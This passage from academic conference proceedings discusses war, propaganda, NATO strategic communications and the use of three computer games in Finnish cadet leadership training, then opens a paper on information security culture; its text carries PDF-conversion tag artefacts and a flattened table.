accord<strong>in</strong>g to the power you need. On the other hand, <strong>in</strong> the games you can also plan and simulate<br />
operations as <strong>in</strong> real military staffs. In the games you can lead and give tasks, switch operat<strong>in</strong>g<br />
environments and conditions. This is also done <strong>in</strong> real military operations ( Allen 2010; Boisot,<br />
MacMillian, Kyeong 2007). The games also act as a recruit<strong>in</strong>g channel as the young people have a<br />
natural command of gam<strong>in</strong>g and the world of play. Game simulators placed <strong>in</strong> shopp<strong>in</strong>g malls give a<br />
realistic image of for example Afghanistan and under the guise of enterta<strong>in</strong>ment they get the young<br />
people <strong>in</strong>terested <strong>in</strong> the military as an employer. In addition, the movie <strong>in</strong>dustry is us<strong>in</strong>g crime and war<br />
more and more as a frame of reference for the actual story (Peltoniemi 2009).<br />
War shapes society and society shapes the suppositions related to war (Stahl 2010 and Shaw 2005).<br />
War is rewrit<strong>in</strong>g its position as a part of western society, economy, politics and <strong>in</strong>dustry. The media,<br />
advertis<strong>in</strong>g and the Internet enable real-time data transfer where the <strong>in</strong>terfaces of different actors<br />
(political, social, economic, military) blend <strong>in</strong>to a one s<strong>in</strong>gle <strong>in</strong>formation flow. The chance is born, that the<br />
society becomes permeated with security so that its actions can no longer be <strong>in</strong>tervened <strong>in</strong>. Also the<br />
blend<strong>in</strong>g of weapons systems to become more and more like the regular IT systems, especially <strong>in</strong> the<br />
sphere of <strong>in</strong>formation warfare, makes the def<strong>in</strong>itions of warfare, weapon and soldier to be relative. Clear<br />
norms related to violence drag beh<strong>in</strong>d the actual cases. A typical example of this is the <strong>in</strong>formation battle<br />
141
Aki-Mauri Huht<strong>in</strong>en<br />
between Wikileaks and the Pentagon. The facts are miss<strong>in</strong>g and we depend on impressions (Ellul 1965;<br />
Gray C.H. 2002).<br />
In this article I try to describe the postmodern complex networks of different k<strong>in</strong>ds of actors of mak<strong>in</strong>g war<br />
and security. The ma<strong>in</strong> argument is that all actors from a s<strong>in</strong>gle poor young dropout to a high political<br />
level state member are part of the complex ‘military-<strong>in</strong>dustrial-advertis<strong>in</strong>g systems’. The real combat for<br />
example <strong>in</strong> Afghanistan is connected to the high-technology <strong>in</strong>dustry and advertis<strong>in</strong>g market. For<br />
example, warfare of the <strong>in</strong>formation age is represented by computer games. There is also a possibility<br />
that the news of war and conflict are not real anymore, but a complex level represented and framed to a<br />
level that is familiar to our senses (Stahl 2010).<br />
2. The propaganda of war - perception and its representation<br />
Charles S. Peirce is one of the creators of the concept of semiotics and representation. Accord<strong>in</strong>g to his<br />
theory, the moment before a person becomes conscious is preceded by a numerous series of<br />
perceptions of which we are unaware. In other words, accord<strong>in</strong>g to him, we are never temporally directly<br />
simultaneously <strong>in</strong> contact with the object. The object is thus a hypothetical boundary, which can be<br />
approached but never touched as such. This assumption is based on the idea of the cont<strong>in</strong>uity of time<br />
(Bergman 2010, 80-81). Representation means two different k<strong>in</strong>ds of phenomenon. The first one is to try<br />
return<strong>in</strong>g the phenomena <strong>in</strong>to this moment. The second one is to stand for the absent phenomena. The<br />
representation of the world is not real, because there is always someth<strong>in</strong>g beyond the frame of<br />
representation. The <strong>in</strong>creas<strong>in</strong>g amount of <strong>in</strong>formation we receive by sight makes it impossible for us to<br />
filter all of it. This means that “the more you watch, the less you know” (Strazzanti 2009: 14).<br />
Thus, we are always look<strong>in</strong>g at the world through some frame or other. When a journalist reports the<br />
news from Afghanistan or a producer of video games designs a war game, the attempt to say someth<strong>in</strong>g<br />
about the actual activities is always limited and subjective. The po<strong>in</strong>t of view of the media is also always<br />
subjective. And even the best video game can do no more than provide a representation of actual<br />
warfare. Today, the reasons for war are justified <strong>in</strong> the narrative struggle between different viewpo<strong>in</strong>ts.<br />
The credibility of different stories is weighed through the media. With their op<strong>in</strong>ions, people vote on<br />
whose story is the most credible. We can no longer speak of the truth. In relation to war there is no such<br />
th<strong>in</strong>g, s<strong>in</strong>ce the producer or author of a documentary or a piece of news is connected through different<br />
networks to the makers of war themselves. The salaries of those who photograph war are paid through<br />
war and its mak<strong>in</strong>g. Correspond<strong>in</strong>gly, video games need real soldiers who have experienced combat <strong>in</strong><br />
order for them to be developed <strong>in</strong> a more authentic direction (Krishnan 2009; Palojärvi 2009; Stahl 2010).<br />
Accord<strong>in</strong>g to Ellul (1965) propaganda is a social phenomenon rather than someth<strong>in</strong>g that is made by<br />
certa<strong>in</strong> people for certa<strong>in</strong> purposes. Propaganda exists and thrives. Propaganda aims not only to change<br />
people’s op<strong>in</strong>ions, but tries to lead men <strong>in</strong>to action. Ellul sees propaganda <strong>in</strong> two forms: agitation<br />
propaganda and <strong>in</strong>tegration propaganda. Integration propaganda is an organic part of a technological<br />
society. Modern propaganda cannot also work without knowledge of technological science. Not only is<br />
propaganda itself a technique, it is also an <strong>in</strong>dispensable condition for the development of technical<br />
progress and the establishment of a technical civilization. The propagandist is anyone who<br />
communicates his ideas with the <strong>in</strong>tent of <strong>in</strong>fluenc<strong>in</strong>g his listener.<br />
The so called “diffused audience” (Hosk<strong>in</strong>s and O’Loughl<strong>in</strong> 2010,14) means that everyone becomes an<br />
audience all the time and there are no possibilities to analyse beforehand who will be the target audience<br />
<strong>in</strong> the specific case. The decision-mak<strong>in</strong>g is done through automated surveillance of both onl<strong>in</strong>e and<br />
offl<strong>in</strong>e behaviour. These surveillance technologies “screen out” the normal but br<strong>in</strong>g <strong>in</strong>to focus the<br />
unusual behaviour (ibid.,15). Diffused war has the name of a new paradigm of war <strong>in</strong> which the<br />
mediatisation of war makes it possible to diffuse causal relations between action and effect more,<br />
creat<strong>in</strong>g a greater uncerta<strong>in</strong>ty for policymakers <strong>in</strong> the conduct of war (Hosk<strong>in</strong>s and O’Loughl<strong>in</strong> 2010, 3.).<br />
Today both the sphere of policy and the sphere of bus<strong>in</strong>ess operate under the laws of market<strong>in</strong>g.<br />
Politicians cannot ga<strong>in</strong> support without political advertis<strong>in</strong>g promot<strong>in</strong>g them and their policies as<br />
trademarks. In the case of war, propaganda campaigns are crucial <strong>in</strong> order to ga<strong>in</strong> public support.<br />
(Strazzanti 2009.)<br />
The l<strong>in</strong>k between classical propaganda as the specific technological tool and today’s concepts like<br />
strategic communications is not so far fetched. Everyth<strong>in</strong>g must also be utilized. A good propagandist<br />
must use not only all of the <strong>in</strong>struments, but also different forms of propaganda. The ground must be<br />
sociologically prepared before one can proceed to direct prompt<strong>in</strong>g. Propaganda tends to make the<br />
142
Aki-Mauri Huht<strong>in</strong>en<br />
<strong>in</strong>dividual live <strong>in</strong> a separate world; he must not have outside po<strong>in</strong>ts of reference. Nowadays, the Internet<br />
is based on the same idea, but upside down: there is no possibility to exist without communication. There<br />
are no l<strong>in</strong>es between private and public life.<br />
Accord<strong>in</strong>g to “NATO Military Concept for Strategic Communication” (15OCT2009), execut<strong>in</strong>g a Strategic<br />
Communications process may require cultural or organisational change as it requires a network-centric<br />
approach and speed of decision mak<strong>in</strong>g that may be at odds with more traditional, hierarchical military<br />
structures. It <strong>in</strong>volves empower<strong>in</strong>g the release of <strong>in</strong>formation at levels far below that of most current<br />
structures and an acceptance of greater risk <strong>in</strong> that <strong>in</strong>formation released quickly may not always be<br />
perfect and will require follow-up and ref<strong>in</strong>ement. It also requires the development of a strategic narrative<br />
that will shape NATO’s actions and the manner <strong>in</strong> which those actions are communicated.<br />
NATO policy def<strong>in</strong>es NATO Strategic Communications as follows:<br />
“The coord<strong>in</strong>ated and appropriate use of NATO communications activities and capabilities –<br />
Public Diplomacy, Public Affairs (PA), Military Public Affairs, Information Operations (Info<br />
Ops) and Psychological Operations (PsyOps), as appropriate – <strong>in</strong> support of Alliance<br />
policies, operations and activities, and <strong>in</strong> order to advance NATO’s aims”. (NATO Strategic<br />
Communications Policy, 29 Sep 09).<br />
However, from a military perspective, the Strategic Communications process not only seeks to coord<strong>in</strong>ate<br />
the work of the traditional communication functions of Public Diplomacy, PA, Info Ops and PsyOps, with<br />
each other, but also with the critical operational non-k<strong>in</strong>etic and k<strong>in</strong>etic elements which often convey far<br />
more mean<strong>in</strong>g and have an immeasurably greater impact on people’s perceptions than words or imagery<br />
alone ever could.<br />
3. Information and decision mak<strong>in</strong>g <strong>in</strong> three different worlds<br />
In this chapter I describe the change <strong>in</strong> war through three different worlds as follows:<br />
Table 1: The way of war <strong>in</strong> three different worlds<br />
Rational world Complex world Postmodern world<br />
Weapon(s) - mach<strong>in</strong>e gun -nuclear weapon - Internet<br />
The nature of knowledge - rational knowledege - <strong>in</strong>formation flow - narrative stories<br />
Society - agrarian society - <strong>in</strong>dustrial society - <strong>in</strong>formation society<br />
The name of wars - World War I and II,<br />
Holocaust<br />
- Blitzkrieg 1939-1941,<br />
Pearl Harbour 1941, WTC<br />
2001<br />
- civil wars, French<br />
Revolution,<br />
Communist Revolution,<br />
Vietnam,<br />
War Aga<strong>in</strong>st Terror<br />
Noth<strong>in</strong>g is anyth<strong>in</strong>g,<br />
Slogans We have to decide We have to exploit every<br />
channel to communicate everyth<strong>in</strong>g is all<br />
The model of competition - state versus state - technology versus - public actor versus<br />
technology<br />
private actor,<br />
human versus robot<br />
The structure of - l<strong>in</strong>earity, bureaucracy, - complexity, system - mycelium, conflict<br />
organization<br />
rules<br />
The key actors - muscels, bra<strong>in</strong>s - communications - consume<br />
The key th<strong>in</strong>k<strong>in</strong>g model - first you plan, then you<br />
execute<br />
The authors Max Weber, Frederick<br />
Taylor, “franchis<strong>in</strong>g”,<br />
Clausewitz, Jom<strong>in</strong>i<br />
- plan<strong>in</strong>g and execution<br />
parallel<br />
Herbert Simon, James G.<br />
March, Peter Drucker<br />
“corporate covernance”,<br />
“bounded rationality”,<br />
John Boyd, John Warden<br />
- plan<strong>in</strong>g = execution<br />
Critical Management<br />
Studies CMS,<br />
“The Practice Turn”,<br />
Michel Foucault,<br />
Paul Virilio, Slavoj Zizek<br />
The model of three possible worlds does not mean it is a list from best to worst or an evolutionary<br />
process. The rational world is affect<strong>in</strong>g our time just like the complex and the postmodern ones. For<br />
143
Aki-Mauri Huht<strong>in</strong>en<br />
example, military traditions, traditions and rout<strong>in</strong>es are still formal by nature and even fanatically rational,<br />
sometimes almost to a religious extent. After all, the rational paradigm strives to control and rule the<br />
world by be<strong>in</strong>g meticulous and by elim<strong>in</strong>at<strong>in</strong>g errors. Ask<strong>in</strong>g too many questions is avoided and the<br />
chosen avenues to act are made more effective by plann<strong>in</strong>g. In western countries public adm<strong>in</strong>istration is<br />
still a rational bureaucracy directed and prescribed by legal means. Meanwhile, network<strong>in</strong>g and<br />
<strong>in</strong>formation technology are permeat<strong>in</strong>g the future operations of organisations, through different <strong>in</strong>novation<br />
models, security and safety oriented th<strong>in</strong>k<strong>in</strong>g and strategic leadership th<strong>in</strong>k<strong>in</strong>g models. The idea of<br />
technology and systems th<strong>in</strong>k<strong>in</strong>g is that the world cannot be controlled from the outside by means of<br />
rational plann<strong>in</strong>g, but the control is exercised through practices that are formed by <strong>in</strong>terconnected<br />
technology networks. At the same time with the rational and complex world, <strong>in</strong> the different flashpo<strong>in</strong>ts of<br />
the world there is a very large asymmetry between the crisis management mach<strong>in</strong>e of the West, the local<br />
<strong>in</strong>habitants and the terrorists. The comb<strong>in</strong>ation is conflict<strong>in</strong>g <strong>in</strong> a post modern way. (e.g. Kilcullen 2009)<br />
Information context has a much larger effect on our observation than facts do. A good example of this is a<br />
classic decision mak<strong>in</strong>g experiment. The person arrang<strong>in</strong>g the experiment is auction<strong>in</strong>g a 100 dollar bill to<br />
a group of approximately 30 people. The biggest offer w<strong>in</strong>s the bill, but the one with the second highest<br />
bid has to pay the amount of their own bid without gett<strong>in</strong>g anyth<strong>in</strong>g <strong>in</strong> return. At first there are plenty of<br />
bids because everyone th<strong>in</strong>ks that it is good to bid 20 or 30 dollars for a 100 dollar bill and drop out of the<br />
bidd<strong>in</strong>g <strong>in</strong> time. When the bidd<strong>in</strong>g nears the 100 dollar bids, usually only two bidders rema<strong>in</strong> and an<br />
authority competition develops between them. When the bids pass 100 dollars, the two competitors may<br />
cont<strong>in</strong>ue high risk tak<strong>in</strong>g <strong>in</strong> order to avoid the dead end of the second best bid. The end result usually is<br />
that a 100 bill will cost the w<strong>in</strong>ner 200 dollars (of course the end net loss is 100 dollars) and the one with<br />
the second highest bid has to pay 195 dollars without gett<strong>in</strong>g anyth<strong>in</strong>g <strong>in</strong> return.<br />
This example demonstrates the social and contextual nature of our decision mak<strong>in</strong>g. Usually people with<br />
a high competition drive take enormous risks while try<strong>in</strong>g to maximize the w<strong>in</strong>n<strong>in</strong>gs, no matter what the<br />
cost. In politics and warfare there are countless examples of this, that decision mak<strong>in</strong>g is rarely a rational<br />
event, but is rather based on social and emotional relationships, expectations of our roles and the mental<br />
trap of risk tak<strong>in</strong>g ( Soeters, van Fenema, Beeres 2010; Taylor 2010; Zizek 2009 and 2006).<br />
However, war cannot change its nature. War is still organised violence. The question is if the new wave<br />
of warfare causes evolution or revolution. The change has happened <strong>in</strong> the character of wars and the<br />
manner <strong>in</strong> which wars were conducted. Like the first and second Iraq wars can show us, war is not about<br />
elim<strong>in</strong>at<strong>in</strong>g targets and dom<strong>in</strong>at<strong>in</strong>g the enemy’s military power. It is purposeful violence to achieve a<br />
political goal. Warfare may be becom<strong>in</strong>g revolutionized, not the military affairs (Shimko 2010; Friedman<br />
2009; L<strong>in</strong>d 2010 ). Still, most of the current military th<strong>in</strong>k<strong>in</strong>g on <strong>in</strong>formation operations (Info Ops) and<br />
strategic communications is based on the assumption that it is possible to take command and control<br />
(C2) of the battle space (Taylor 2010, 13). Info Ops is not about what you say but what you do. In a<br />
military organisation, its physical superiority and technological advantage work aga<strong>in</strong>st it, because all<br />
through western military history, the key issue for victory has been “de-escalation”. The state military<br />
must seek <strong>in</strong> every possible way to de-escalate, to resolve the situation without violence or with a<br />
m<strong>in</strong>imum amount of violence (L<strong>in</strong>d 2010, 35). The key idea of the new model of the science of war will be<br />
the so called “Jo<strong>in</strong>t Distributed Operations”.<br />
4. Computer games as a way of communication <strong>in</strong> three different worlds<br />
This chapter <strong>in</strong>troduces the computer game exercise held for the cadets <strong>in</strong> the Bachelor’s degree<br />
programme <strong>in</strong> the F<strong>in</strong>nish National Defence University <strong>in</strong> the autumn of 2009.<br />
Dur<strong>in</strong>g the course Introduction to Leadership, <strong>in</strong> 2009, three computer games were <strong>in</strong>troduced, each<br />
represent<strong>in</strong>g their own genre. Modern games are <strong>in</strong>creas<strong>in</strong>gly comb<strong>in</strong>ations of different genres. Dur<strong>in</strong>g<br />
the course the three games of different genres tried to demonstrate the development of <strong>in</strong>teraction<br />
between the game and the player.<br />
The enormous technological development and the <strong>in</strong>creased turnover mean the arcades and video game<br />
programm<strong>in</strong>g companies have been able to grow and develop new genres and platforms. Usually games<br />
are categorized based on their mechanics. This means that two games of the same genre may differ from<br />
each other <strong>in</strong> terms of narratives and visual properties. Many games exploit several game mechanics; for<br />
example 'party games', developed to be used by several people us<strong>in</strong>g the same console, and which<br />
typically consist of a range of 'm<strong>in</strong>i games' and genres. A game may also consist of one genre only. An<br />
144
Aki-Mauri Huht<strong>in</strong>en<br />
example of this would be a 'fight<strong>in</strong>g game', which focuses on the close combat between the characters<br />
controlled by the gamer and the adversary controlled by the programme.<br />
4.1 The games of the 'rational world'<br />
The logic of the 'rational world’s' games is that the player or “cyber-soldier” actively controls the game,<br />
which passively reacts to the player's actions. The decision mak<strong>in</strong>g process is based on an idea of a<br />
rational environment and communication relationships. This means that the player has to be precise and<br />
acts to be both quick and accurate. Communication is not dialogue between game and player. When the<br />
player makes mistakes, the game only becomes passive. The basic idea is that reality can be controlled<br />
immediately and there is no difference between the representation processes.<br />
One of the first games to be <strong>in</strong>troduced was Super Mario Brothers, which is a limited-range game where<br />
the character moves from a level to another. Typical for games of this type is that it presents the<br />
character from a side-view, and that the game advances <strong>in</strong> different 'worlds' or on different levels, where<br />
the character collects items, dodges objects, destroys enemies and solves different problems. In Mario<br />
the object is very clear: to save pr<strong>in</strong>cess Peach from the evil Koopa turtle. In order to do this, the player<br />
has to pass several levels, at the end of which there are different opponents that test the player's skills<br />
and nerves. On the last level the player confronts the k<strong>in</strong>g of the Koopa turtles, and after defeat<strong>in</strong>g him<br />
the game is over. The player <strong>in</strong>teracts with the game by controll<strong>in</strong>g the motions and movements of the<br />
character with the buttons of the controller, and by aim<strong>in</strong>g to advance onto the next level. The game does<br />
not allow the player to vary the game strategies, and the player has to 'pass' the game with a set trick and<br />
advance with<strong>in</strong> the limits set by the game. The game gives feedback by notify<strong>in</strong>g the players of the value<br />
of 'co<strong>in</strong>s' collected dur<strong>in</strong>g the game, and of the time left to complete the level. If the character fails to<br />
complete the task, the player loses a 'life', which gives the player new chances to try and complete the<br />
level.<br />
Simple 'jump level' and adventure games are now ma<strong>in</strong>ly enterta<strong>in</strong>ment used on portable platforms while<br />
travell<strong>in</strong>g or a game type for players who want to compete aga<strong>in</strong>st the computer. There is also<br />
<strong>in</strong>ternational competitiveness. For this game type, there are lists of high scor<strong>in</strong>g gamers, which allow the<br />
competition aga<strong>in</strong>st someone with a better score. This is typical for mobile phone games, as the spread<br />
of wireless networks allows the use of the Internet also while on the move.<br />
4.2 The games of the 'complex world'<br />
In the games of the 'complex world' the player adopts a position <strong>in</strong> the game and the game gives<br />
feedback on the player's capability to understand the networks with<strong>in</strong> the game. The player is the more<br />
dom<strong>in</strong>ant part of the game. The decision mak<strong>in</strong>g process is based on the idea of a complex systembased<br />
environment and communication relationships. The basic idea of this level is that there are<br />
different k<strong>in</strong>ds of representations processes but we can still control over them.<br />
As an example of this genre, the shoot<strong>in</strong>g game Half Life and Counter Life, which is designed especially<br />
for onl<strong>in</strong>e-gam<strong>in</strong>g, can be <strong>in</strong>troduced,. It is an FPS (First Person Shooter) game, where the player<br />
controls a terrorist or a counter terrorist character, <strong>in</strong> first person, <strong>in</strong> a team based shoot<strong>in</strong>g game. The<br />
duty of the counter terrorists is to prevent the activation of a bomb or dismantle it, rescue hostages or<br />
protect VIPs. Respectively, the terrorists try to plant the bomb <strong>in</strong> its target, withhold the hostages, or stop<br />
the VIPs from enter<strong>in</strong>g the secure area. The game is played for certa<strong>in</strong> lapses of time, dur<strong>in</strong>g which either<br />
of the parties have to complete their mission. The goal of the team is to play a certa<strong>in</strong> number of rounds,<br />
and the team w<strong>in</strong>n<strong>in</strong>g most rounds also w<strong>in</strong>s the game. A team may w<strong>in</strong> either by complet<strong>in</strong>g their<br />
mission, or by elim<strong>in</strong>at<strong>in</strong>g the enemy team. A reward system is a crucial part of the game: victories, both<br />
team and personal, are rewarded with 'money', which can be spent on better arms and equipment.<br />
The big change compared to jump<strong>in</strong>g levels and a restricted game environment is the <strong>in</strong>teractive impact<br />
of the players on each other. The game conta<strong>in</strong>s maps, which do not necessarily <strong>in</strong>fluence the player's<br />
actions, but create the aims and 'frames' for the players. Factors impact<strong>in</strong>g the gam<strong>in</strong>g are the<br />
cooperation between the team members and the impact caused by the enemy. Controll<strong>in</strong>g the game is<br />
made simple, but succeed<strong>in</strong>g <strong>in</strong> the game requires practice and several hours of experience <strong>in</strong> eyemouse<br />
coord<strong>in</strong>ation. This is why FPS games are referred to as skill games, and there are several<br />
<strong>in</strong>dividual and team esports (electronics sports) tournaments both onl<strong>in</strong>e and <strong>in</strong> LAN-happen<strong>in</strong>gs.<br />
145
4.3 Games of the 'postmodern world'<br />
Aki-Mauri Huht<strong>in</strong>en<br />
In the games of the 'postmodern world' the game and the players are equals and the player has no<br />
authority over the course of the game. Communication is bidirectional. The games of the postmodern era<br />
are an analogy for the transition <strong>in</strong>to social media, which, <strong>in</strong> a sense, are a simulation of postmodern<br />
computer games. The decision mak<strong>in</strong>g process is based on the idea of a chaotic and non-rational<br />
environment and communication relationships. The basic idea is that there are different k<strong>in</strong>ds of<br />
narratives and we have no one and only right representation process.<br />
As the third game example we <strong>in</strong>troduce an MMORPG (Massive Multiplayer Onl<strong>in</strong>e Role-play<strong>in</strong>g Game)<br />
World of Warcraft. Computer games are traditionally understood as games where the player creates and<br />
controls the character, the properties and skills it develops as the game advances. Role-play<strong>in</strong>g games<br />
may be either serious, plotted games where the focus is on problem solv<strong>in</strong>g or on the development of the<br />
plot, or fast-paced combat games. In traditional table games, enact<strong>in</strong>g the character is part of the game.<br />
This is a feature most computer games lack, but depend<strong>in</strong>g on the players, they may empathise with their<br />
characters. Especially <strong>in</strong> onl<strong>in</strong>e role-games this option is available, and for example <strong>in</strong> World of Warcraft<br />
the players are offered special RP (role play<strong>in</strong>g) servers, where the rules of the server demand devotion<br />
to the game character's role.<br />
In World of Warcraft and <strong>in</strong> the genre it represents the player can utilise the features of traditional role<br />
play<strong>in</strong>g games <strong>in</strong> creat<strong>in</strong>g and develop<strong>in</strong>g their character. Play<strong>in</strong>g on the Internet with other players<br />
creates a social element <strong>in</strong> the game, where develop<strong>in</strong>g your own character and accomplish<strong>in</strong>g missions<br />
together with the others, manag<strong>in</strong>g your wealth and the battles between the players are important<br />
aspects of the game. At the moment, World of Warcraft is the most successful onl<strong>in</strong>e game of its genre,<br />
with almost 11 million players worldwide. Especially successful features of the game are its realization of<br />
the game 'world', the missions executed alone or as a team, and the development of the characters and<br />
their battle. An example of a well realized social aspect <strong>in</strong>cludes large guild networks, through which it is<br />
possible to organise guild cooperation, such as conquer<strong>in</strong>g caves and battl<strong>in</strong>g group aga<strong>in</strong>st group. The<br />
possibility to play either alone or as part of a group makes MMORPGs highly <strong>in</strong>teractive. A s<strong>in</strong>gle player<br />
may witness a lot of content variation due to the other gamers' actions and due to the extensive game<br />
'world'.<br />
In modern MMORPG gam<strong>in</strong>g culture also the f<strong>in</strong>ancially substantial tournaments are essential. Usually<br />
tournaments focus on a certa<strong>in</strong> aspect of the games, e.g. combat. The develop<strong>in</strong>g ESports-leagues<br />
advance competitive gam<strong>in</strong>g and have created the subtype of professional gam<strong>in</strong>g, especially <strong>in</strong> World of<br />
Warcraft, where the players combat each other "to the last man".<br />
5. Conclusions - eye as a function of weapons<br />
In the western security understand<strong>in</strong>g the function of the eye has become the function of weapons.<br />
Western culture has moved from liv<strong>in</strong>g a physical life to sitt<strong>in</strong>g beh<strong>in</strong>d the computer screen. When you<br />
can see the target on your screen, you expect to <strong>in</strong>fluence or (<strong>in</strong> combat environment) destroy it. What is<br />
perceived is already lost. We cannot live without act<strong>in</strong>g and communicat<strong>in</strong>g. Unlike weapons which have<br />
to be publicised if they are to have real deterrent effects, stealth equipment can only function if its<br />
existence is clouded with uncerta<strong>in</strong>ty. This is the so called “aesthetics of disappearance” (Virilio 1989).<br />
The history of the games <strong>in</strong>dustry is heavily concentrated on the USA and Japan. The United K<strong>in</strong>gdom,<br />
South Korea and Canada are also very strong. In the USA 40% of gamers are female. There is an<br />
argument that the easy access to guns <strong>in</strong> the USA has more of an effect on gun violence than shoot<strong>in</strong>g<br />
games do (Peltoniemi 2009). A “rational-complex-mycelium cha<strong>in</strong>” can be observed through the<br />
development of game mechanics. The older games, <strong>in</strong> the 1970's and 1980's, were all rational; only one<br />
correct solution and order <strong>in</strong> which to complete th<strong>in</strong>gs. In the 1990's the free roam<strong>in</strong>g or sandbox games<br />
became popular where the player def<strong>in</strong>es the goal and there are many ways to reach it. These can be<br />
seen as complex games. A well known example of a game like this is Sim City from 1989. We can also<br />
see the same trend for evolution of western security needs and the military-<strong>in</strong>dustrial complex.<br />
In this article I have tried to describe that the more electronic solutions we have created <strong>in</strong> a battle space,<br />
the more rational the art of war still rema<strong>in</strong>s. The Vietnam War became a test<strong>in</strong>g ground for electronic<br />
warfare and automated command and sensor networks. Information warfare is also the reflection of all<br />
our fantasies, dreams and wishful th<strong>in</strong>k<strong>in</strong>g. Not the least of which, the dream of <strong>in</strong>visibility, is formalised<br />
by the possibility of act<strong>in</strong>g <strong>in</strong> cyber(computer)space by mask<strong>in</strong>g our identity, by rema<strong>in</strong><strong>in</strong>g elusive,<br />
146
Aki-Mauri Huht<strong>in</strong>en<br />
untraceable and unidentifiable. Attackers use this capability. Absolute <strong>in</strong>formation control and dom<strong>in</strong>ance<br />
is based on the idea of understand<strong>in</strong>g everyth<strong>in</strong>g and see<strong>in</strong>g beyond the horizon without be<strong>in</strong>g seen.<br />
References<br />
Allen, Patrick D. (2010) Information Operations Plann<strong>in</strong>g. Boston: Artech House.<br />
Armitage, John. (2003a) ”Militarized Bodies: An Introduction”. Body & Society vol. 9;1, pp. 1-12.<br />
Baudrillard, Jean. (2010) Carnival and Cannibal. Ventriloquous Evil. London: Seagull Books.<br />
Baudrillard, Jean. (2005) The System of Objects. Translated by James Benedict. London: Verso.<br />
Bergman, Mats. (2010) “Presentaatio vai representaatio? Charles S. Peircen perseptioteorian merkilliset vaiheet”.<br />
Representaatio. Tiedon kivijalasta tieteiden työkaluksi, Tarja Knuutila & Aki Petteri Leht<strong>in</strong>en (eds), Hels<strong>in</strong>ki:<br />
Gaudeamus. Hels<strong>in</strong>ki University Press, pp. 75-94.<br />
Boisot, Max H., MacMillian, Ian C., and Han, Kyeong Seok. (2007) Explorations <strong>in</strong> Information Space. Knowledge,<br />
Agents, and Organisation. England: Oxford University Press.<br />
Bousquet, Anto<strong>in</strong>e. (2009) The Scientific Way of Warfare: Order and Chaos on the Battlefields of Modernity. London:<br />
Hurst & Company.<br />
Campen, Al. (1996) Cyberwar. Wash<strong>in</strong>gton DC: AFCEA Press.<br />
Campen, Al. (1992) The First Information Warfare: The Story of Computers and Intelligence Systems <strong>in</strong> the Persian<br />
Gulf War. Wash<strong>in</strong>gton DC:AFCEA International Press.<br />
Czosseck, Christian and Geers, Kenneth (Eds.). (2009) The Virtual Battlefield: Perspectives on Cyber Warfare.<br />
Amsterdam: IOS Press.<br />
Ellul, Jacques. (1965) Propaganda. The Formation of Men’s Attitudes. Translated by Konrad Kellen and Jean Lerner.<br />
New York: Alfred A. Knopf.<br />
Friedman, Norman. (2009) Network-Centric Warfare. How Navies Learned to Fight Smarter through Three World<br />
Wars. Annapolis: Naval Institute Press.<br />
Gray, C.H. (2002) Cyborg Citizen: Politics <strong>in</strong> the Posthuman Age. London: Routledge.<br />
Gray, Coll<strong>in</strong>. (2007) Another Bloody Century: Future Warfare. London: Phoenix.<br />
Hosk<strong>in</strong>s, Andrew and O’Loughl<strong>in</strong>, Ben. 2010. War and Media. The Emergence of Diffused War. Cambridge: Polity<br />
Press.<br />
Kilcullen, David. (2009) The Accidental Guerilla. Fight<strong>in</strong>g Small Wars <strong>in</strong> the Midst of a Big One. London: Hurst &<br />
Company.<br />
Krishnan, Arm<strong>in</strong>. (2009) Killer Robots. Legality and Ethicality of Autonomous Weapons. Ashgate.<br />
L<strong>in</strong>d, Williams. (2010) “The Power of Weakness”. In David, G. J.; McKeld<strong>in</strong> III, T.R. (2009, edit.) Ideas as Weapons.<br />
Influence Perception <strong>in</strong> Modern Warfare. Wash<strong>in</strong>gton D.C.: Potomac Books, pp. 35-38.<br />
Palojärvi, Pia. (2009) A Battle <strong>in</strong> Bits and Bytes: Computer Network Attacks and the Law of Armed Conflict.<br />
Publications of the Erik Castrén Insititute of International Law and Human Rights. University of Hels<strong>in</strong>ki. The<br />
Erik Castrén Research Reports 27/2009.<br />
Peltoniemi, Mirva. (2009) Industry Life-Cycle Theory <strong>in</strong> the Cultural Doma<strong>in</strong>: Dynamics of the Game Industry.<br />
Tampere University of Technology, publication 805. (Disserm<strong>in</strong>ation).<br />
NATO Military Concept for Strategic Communication” (15OCT2009). [Available at:<br />
http://www.nato.<strong>in</strong>t/shape/news/2009/12/091215a.html (07022011)].<br />
Shaw, Mart<strong>in</strong>. (2005) The New Western Way of War. Risk-Transfer War and its Crisis <strong>in</strong> Iraq. Cambridge: Polity<br />
Press.<br />
Stahl, Roger. (2010) Milita<strong>in</strong>ment, INC. War, Media, and Popular Culture. New York: Routledge.<br />
Shimko, Keith L. (2010) The Iraq Wars and America’s Military Revolution. Cambridge University Press.<br />
Soeters, Joseph, Paul C. van Fenema and Robert Beeres. (2010) “Introduc<strong>in</strong>g military organizations” Manag<strong>in</strong>g<br />
Military Organizations. Theory and practice. Edited by Joseph Soeters, Paul C. van Fenema and Robert<br />
Beeres. London: Routledge, pp. 1-14.<br />
Strazzanti, Laura. (2009) Did the Media Sell War as a Product? The Case of the Iraq War 2001-2003. München:<br />
Mart<strong>in</strong> MeidenBauer Verlagsbuchhandlung.<br />
Taylor, Philp. (2010) “The Limits of Military Information Strategies”. In David, G. J.; McKeld<strong>in</strong> III, T.R. (2009, edit.)<br />
Ideas as Weapons. Influence Perception <strong>in</strong> Modern Warfare. Wash<strong>in</strong>gton D.C.: Potomac Books, pp. 13-16).<br />
Taylor, Philip. (2003) Munitions of the M<strong>in</strong>d: A History of Propaganda from the Ancient World to the Present Day.<br />
Manchester University Press, 3rd edition.<br />
Virilio, Paul. (2009) The Aesthetics of Disappearance. Translated by Philip Beitchman. Los Angels: Semiotext(e).<br />
Virilio, Paul. (1989) War and C<strong>in</strong>ema. The Logistics of Perception. Translated by Patrick Camiller. London: Verso.<br />
147
Information <strong>Security</strong> Culture or Information Safety Culture –<br />
What do Words Convey?<br />
Ilona Ilvonen<br />
Tampere University of Technology, Tampere, F<strong>in</strong>land<br />
ilona.ilvonen@tut.fi<br />
Abstract: In the contemporary world of constantly chang<strong>in</strong>g <strong>in</strong>formation threats, <strong>in</strong>formation security culture is a<br />
concept that many organizations should emphasize on. Many threats cannot be countered only with sophisticated<br />
technical equipment. Instead, the attitudes and actions of employees ga<strong>in</strong> significance each day, be the threat an<br />
urge to leak company confidential documents to Wikileaks or to competitors, or will<strong>in</strong>gness to help a ”colleague” with<br />
an unconventional request. Information security culture is a concept widely accepted <strong>in</strong> the field of <strong>in</strong>formation<br />
